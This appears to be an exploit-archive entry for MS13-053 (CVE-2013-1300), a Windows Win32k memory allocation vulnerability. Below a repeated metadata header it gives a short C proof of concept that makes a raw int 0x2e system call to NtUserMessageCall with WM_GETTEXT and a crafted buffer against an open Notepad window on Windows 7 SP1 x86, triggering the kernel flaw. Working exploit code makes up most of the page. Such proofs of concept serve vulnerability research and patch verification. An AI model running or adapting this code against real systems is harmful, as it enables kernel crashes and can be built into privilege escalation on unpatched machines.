MS13-053 Win32k Memory Allocation Vulnerability
| EKU-ID: 3493 | CVE: 2013-1300 | OSVDB-ID: |
| Author: 0xbigban | Published: 2013-09-13 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 3493 | CVE: 2013-1300 | OSVDB-ID: |
| Author: 0xbigban | Published: 2013-09-13 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
/* more detials: this poc is written by 0xBigBan */#include <windows.h> #define __NtUserMessageCall 0x11ea //on win7 sp1 x86 void SystemCall(DWORD ApiNumber, ...) { __asm{ lea edx, [ebp+0x0c] mov eax, ApiNumber int 0x2e leave ret } } int main() { //you should have open a txt file with notepad HWND handle = FindWindow(NULL,"a.txt - notepad"); void* ptr = malloc(sizeof(int)*2); SystemCall(__NtUserMessageCall, handle, WM_GETTEXT, 0x8, //buffer size ptr, //user mode buffer 0x0, 0x2b3, 0x2); //ASCII boolean/flag }